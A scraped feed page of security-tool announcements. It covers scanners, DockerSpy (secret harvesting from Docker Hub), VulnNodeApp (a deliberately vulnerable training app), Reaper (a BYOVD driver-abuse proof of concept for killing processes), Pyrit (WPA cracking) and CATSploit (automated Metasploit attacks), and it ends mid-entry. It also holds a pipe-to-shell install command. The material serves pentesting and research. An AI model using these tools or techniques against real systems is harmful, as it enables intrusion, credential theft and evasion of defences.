FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

Secator - The Pentester'S Swiss Knife

By: Zion3R


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • Complexity from simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

Name Description Category
httpx Fast HTTP prober. http
cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler
gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler
gospider Fast web spider written in Go. http/crawler
katana Next-generation crawling and spidering framework. http/crawler
dirsearch Web path discovery. http/fuzzer
feroxbuster Simple, fast, recursive content discovery tool written in Rust. http/fuzzer
ffuf Fast web fuzzer written in Go. http/fuzzer
h8mail Email OSINT and breach hunting tool. osint
dnsx Fast and multi-purpose DNS toolkit designed for running DNS queries. recon/dns
dnsxbrute Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). recon/dns
subfinder Fast subdomain finder. recon/dns
fping Find alive hosts on local networks. recon/ip
mapcidr Expand CIDR ranges into IPs. recon/ip
naabu Fast port discovery tool. recon/port
maigret Hunt for user accounts across many websites. recon/user
gf A wrapper around grep to avoid typing common patterns. tagger
grype A vulnerability scanner for container images and filesystems. vuln/code
dalfox Powerful XSS scanning tool and parameter analyzer. vuln/http
msfconsole CLI to access and work with the Metasploit Framework. vuln/http
wpscan WordPress Security Scanner vuln/multi
nmap Vulnerability scanner using NSE scripts. vuln/multi
nuclei Fast and customisable vulnerability scanner based on simple YAML based DSL. vuln/multi
searchsploit Exploit searcher. exploit/search

Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

Installing addons

secator comes installed with the minimum amount of dependencies.

There are several addons available for secator:

worker Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
secator install addons worker
google Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis Add support for Redis backend (Celery).
secator install addons redis
dev Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves

Checking installation health

To figure out which languages or tools are installed on your system (along with their version):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a url crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

and more... to list all tasks / workflows / scans that you can use:

secator x --help
secator w --help
secator s --help

Learn more

To go deeper with secator, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More

By: Zion3R


DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.


What is Docker?

Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.

About Docker Hub

Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.

Why OSINT on Docker Hub?

Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:

  1. Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.

  2. Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.

  3. Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.

  4. Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.

  5. Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.

Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.

How DockerSpy Works

DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.

Getting Started

To use DockerSpy, follow these steps:

  1. Installation: Clone the DockerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
  1. Usage: Run DockerSpy from terminal.
dockerspy

Custom Configurations

To customize DockerSpy configurations, edit the following files: - Regular Expressions - Ignored File Extensions

Disclaimer

DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.

Contribution

Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

About the Author

DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)

I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.

Consider following me:

DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (2) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (3) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (4)


Thanks

Special thanks to @akaclandestine



VulnNodeApp - A Vulnerable Node.Js Application

By: Zion3R


A vulnerable application made using node.js, express server and ejs template engine. This application is meant for educational purposes only.


Setup

Clone this repository

git clone https://github.com/4auvar/VulnNodeApp.git

Application setup:

  • Install the latest node.js version with npm.
  • Open terminal/command prompt and navigate to the location of downloaded/cloned repository.
  • Run command: npm install

DB setup

  • Install and configure latest mysql version and start the mysql service/deamon
  • Login with root user in mysql and run below sql script:
CREATE USER 'vulnnodeapp'@'localhost' IDENTIFIED BY 'password';
create database vuln_node_app_db;
GRANT ALL PRIVILEGES ON vuln_node_app_db.* TO 'vulnnodeapp'@'localhost';
USE vuln_node_app_db;
create table users (id int AUTO_INCREMENT PRIMARY KEY, fullname varchar(255), username varchar(255),password varchar(255), email varchar(255), phone varchar(255), profilepic varchar(255));
insert into users(fullname,username,password,email,phone) values("test1","test1","test1","test1@test.com","976543210");
insert into users(fullname,username,password,email,phone) values("test2","test2","test2","test2@test.com","9887987541");
insert into users(fullname,username,password,email,phone) values("test3","test3","test3","test3@test.com","9876987611");
insert into users(fullname,username,password,email,phone) values("test4","test4","test4","test4@test.com","9123459876");
insert into users(fullname,username,password,email,phone) values("test5","test5","test 5","test5@test.com","7893451230");

Set basic environment variable

  • User needs to set the below environment variable.
    • DATABASE_HOST (E.g: localhost, 127.0.0.1, etc...)
    • DATABASE_NAME (E.g: vuln_node_app_db or DB name you change in above DB script)
    • DATABASE_USER (E.g: vulnnodeapp or user name you change in above DB script)
    • DATABASE_PASS (E.g: password or password you change in above DB script)

Start the server

  • Open the command prompt/terminal and navigate to the location of your repository
  • Run command: npm start
  • Access the application at http://localhost:3000

Vulnerability covered

  • SQL Injection
  • Cross Site Scripting (XSS)
  • Insecure Direct Object Reference (IDOR)
  • Command Injection
  • Arbitrary File Retrieval
  • Regular Expression Injection
  • External XML Entity Injection (XXE)
  • Node js Deserialization
  • Security Misconfiguration
  • Insecure Session Management

TODO

  • Will add new vulnerabilities such as CORS, Template Injection, etc...
  • Improve application documentation

Issues

  • In case of bugs in the application, feel free to create an issues on github.

Contribution

  • Feel free to create a pull request for any contribution.

You can reach me out at @4auvar



Reaper - Proof Of Concept On BYOVD Attack

By: Zion3R


Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.


Features

  • Kill process
  • Suspend process

Help

      ____
/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
/_/

[Coded by MrEmpy]
[v1.0]

Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process

Values:
PROCESSID process id to suspend/kill

Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337

Demonstration

Install

You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

Note: The executable and driver must be in the same directory.



Pyrit - The Famous WPA Precomputed Cracker

By: Zion3R


Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

  • A single storage (e.g. a MySQL-server)
  • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
  • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

What's new

  • Fixed #479 and #481
  • Pyrit CUDA now compiles in OSX with Toolkit 7.5
  • Added use_CUDA and use_OpenCL in config file
  • Improved cores listing and managing
  • limit_ncpus now disables all CPUs when set to value <= 0
  • Improve CCMP packet identification, thanks to yannayl

See CHANGELOG file for a better description.

How to use

Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

How to participate

You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



JAW - A Graph-based Security Analysis Framework For Client-side JavaScript

By: Zion3R

An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

Release Notes:


Overview of JAW

The architecture of the JAW is shown below.

Test Inputs

JAW can be used in two distinct ways:

  1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

  2. Web Application Analysis: Analyze a web application by providing a single seed URL.

Data Collection

  • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

HPG Construction

  • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

  • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions).

Analysis and Outputs

  • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

  • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

  • The outputs will be stored in the same folder as that of input.

Setup

The installation script relies on the following prerequisites: - Latest version of npm package manager (node js) - Any stable version of python 3.x - Python pip package manager

Afterwards, install the necessary dependencies via:

$ ./install.sh

For detailed installation instructions, please see here.

Quick Start

Running the Pipeline

You can run an instance of the pipeline in a background screen via:

$ python3 -m run_pipeline --conf=config.yaml

The CLI provides the following options:

$ python3 -m run_pipeline -h

usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

This script runs the tool pipeline.

optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

Quick Example

For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

Crawling and Data Collection

This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScipt file that you already have on your file system, you can skip this step.

JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

Playwright CLI with Foxhound

This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

Puppeteer CLI

To start the crawler, do:

$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

See here for more information.

Selenium CLI

To start the crawler, do:

$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d

Please refer to the documentation of the hpg_crawler here for more information.

Graph Construction

HPG Construction CLI

To generate an HPG for a given (set of) JavaScript file(s), do:

$ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG, must be i
--mode: determines the output format (csv or graphML)

HPG Import CLI

To import an HPG inside a neo4j graph database (docker instance), do:

$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h

usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

This script imports a CSV of a property graph into a neo4j docker database.

optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)

HPG Construction and Import CLI (v1)

In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

Specification of Parameters:

  • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
  • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
  • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
  • --hybrid=bool: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputing files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
  • --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of obsevered network requests, pass the string false to exclude (default: request_logs_short.out).
  • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
  • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
  • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

For more information, you can use the help CLI provided with the graph construction API:

$ python3 -m engine.api -h

Security Analysis

The constructed HPG can then be queried using Cypher or the NeoModel ORM.

Running Custom Graph traversals

You should place and run your queries in analyses/<ANALYSIS_NAME>.

Option 1: Using the NeoModel ORM (Deprecated)

You can use the NeoModel ORM to query the HPG. To write a query:

  • (1) Check out the HPG data model and syntax tree.
  • (2) Check out the ORM model for HPGs
  • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_orm  

For more information, please see here.

Option 2: Using Cypher Queries

You can use Cypher to write custom queries. For this:

  • (1) Check out the HPG data model and syntax tree.
  • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_cypher

For more information, please see here.

Vulnerability Detection

This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering

Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:

request_hijacking:
enabled: true
# [...]
#
domclobbering:
enabled: false
# [...]

cs_csrf:
enabled: false
# [...]

Step 2. Run an instance of the pipeline with:

$ python3 -m run_pipeline --conf=config.yaml

Hint. You can run multiple instances of the pipeline under different screens:

$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]

To generate parallel configuration files automatically, you may use the generate_config.py script.

How to Interpret the Output of the Analysis?

The outputs will be stored in a file called sink.flows.out in the same folder as that of the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a, semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point. However, a request marked with ['NON-REACH'] is not forgeable.

An example output entry is shown below:

[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href

This entry shows that on line 29, there is a $.ajax call expression, and this call expression triggers an ajax request with the url template value of ajaxloc + "/bearer1234/, where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, thus forgeable through ['WIN.LOC'].

Test Web Application

In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.

First, install the dependencies via:

$ cd tests/test-webapp
$ npm install

Then, run the application in a new screen:

$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

Detailed Documentation.

For more information, visit our wiki page here. Below is a table of contents for quick access.

The Web Crawler of JAW

Data Model of Hybrid Property Graphs (HPGs)

Graph Construction

Graph Traversals

Contribution and Code Of Conduct

Pull requests are always welcomed. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

Academic Publication

If you use the JAW for academic research, we encourage you to cite the following paper:

@inproceedings{JAW,
title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
author= {Soheil Khodayari and Giancarlo Pellegrino},
booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
year = {2021},
address = {Vancouver, B.C.},
publisher = {{USENIX} Association},
}

Acknowledgements

JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



SploitScan - A Sophisticated Cybersecurity Utility Designed To Provide Detailed Information On Vulnerabilities And Associated Proof-Of-Concept (PoC) Exploits

By: Zion3R


SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.


Features
  • CVE Information Retrieval: Fetches CVE details from the National Vulnerability Database.
  • EPSS Integration: Includes Exploit Prediction Scoring System (EPSS) data, offering a probability score for the likelihood of CVE exploitation, aiding in prioritization.
  • PoC Exploits Aggregation: Gathers publicly available PoC exploits, enhancing the understanding of vulnerabilities.
  • CISA KEV: Shows if the CVE has been listed in the Known Exploited Vulnerabilities (KEV) of CISA.
  • Patching Priority System: Evaluates and assigns a priority rating for patching based on various factors including public exploits availability.
  • Multi-CVE Support and Export Options: Supports multiple CVEs in a single run and allows exporting the results to JSON and CSV formats.
  • User-Friendly Interface: Easy to use, providing clear and concise information.
  • Comprehensive Security Tool: Ideal for quick security assessments and staying informed about recent vulnerabilities.

Usage

Regular:

python sploitscan.py CVE-YYYY-NNNNN

Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.

python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN

Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.

python sploitscan.py CVE-YYYY-NNNNN -e JSON

Patching Prioritization System

The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:

  • A+ Priority: Assigned to CVEs listed in CISA's KEV or those with publicly available exploits. This reflects the highest risk and urgency for patching.
  • A to D Priority: Based on a combination of CVSS scores and EPSS probability percentages. The decision matrix is as follows:
  • A: CVSS score >= 6.0 and EPSS score >= 0.2. High severity with a significant probability of exploitation.
  • B: CVSS score >= 6.0 but EPSS score < 0.2. High severity but lower probability of exploitation.
  • C: CVSS score < 6.0 and EPSS score >= 0.2. Lower severity but higher probability of exploitation.
  • D: CVSS score < 6.0 and EPSS score < 0.2. Lower severity and lower probability of exploitation.

This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.


Changelog

[17th February 2024] - Enhancement Update
  • Additional Information: Added further information such as references & vector string
  • Removed: Star count in publicly available exploits

[15th January 2024] - Enhancement Update
  • Multiple CVE Support: Now capable of handling multiple CVE IDs in a single execution.
  • JSON and CSV Export: Added functionality to export results to JSON and CSV files.
  • Enhanced CVE Display: Improved visual differentiation and information layout for each CVE.
  • Patching Priority System: Introduced a priority rating system for patching, influenced by various factors including the availability of public exploits.

[13th January 2024] - Initial Release
  • Initial release of SploitScan.

Contributing

Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.


Author

Alexander Hagenah - URL - Twitter


Credits


Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R


navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


Techniques

Currently, navgix supports 2 techniques for finding vulnerable directories (or location aliases). Those being the following:

Heuristics

navgix will make an initial GET request to the page, and if there are any directories specified on the page HTML (specified in src attributes on html components), it will test each folder in the path for the vulnerability, therefore if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.

Brute-force

navgix will also test for a short list of common directories that are common to have this vulnerability and if any of these directories exist, it will also attempt to confirm if a vulnerability is present.

Installation

git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build

Acknowledgements



Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

By: Zion3R


Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.


What is Mobb?

Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

What does Bugsy do?

Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

Scan

  • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
  • Analyzes the vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Analyze

  • Analyzes the a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Disclaimer

This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.

Usage

You can simply run Bugsy from the command line, using npx:

npx mobbdev


CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

By: Zion3R


CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentester’s skill) .

CATSploit automatically performs penetration tests in the following sequence:

  1. Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.

  2. Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.

  3. Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.

  4. Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.


Prerequisities

CATSploit has the following prerequisites:

  • Kali Linux 2023.2a

Installation

For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloneing and setup
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

  • DBMS
    • dbname: database name created for CATSploit
    • user: username of PostgreSQL
    • password: password of PostgrSQL
    • host: If you are using a database on a remote host, specify the IP address of the host
  • SCENARIO
    • generator.maxscenarios: Maximum number of scenarios to calculate (*)
  • ATTACKPF
    • msfpassword: password of MSFRPCD
    • openvas.user: username of PostgreSQL
    • openvas.password: password of PostgreSQL
    • openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
    • openvas.maxchecks: Maximum number of test items to be test at the same time (*)
  • ATTACKDB
    • attack_db_dir: Path to the folder where AtackSteps are stored

(*) Adjust the number according to the specs of your machine.

Usage

To start the server, execute the following command:

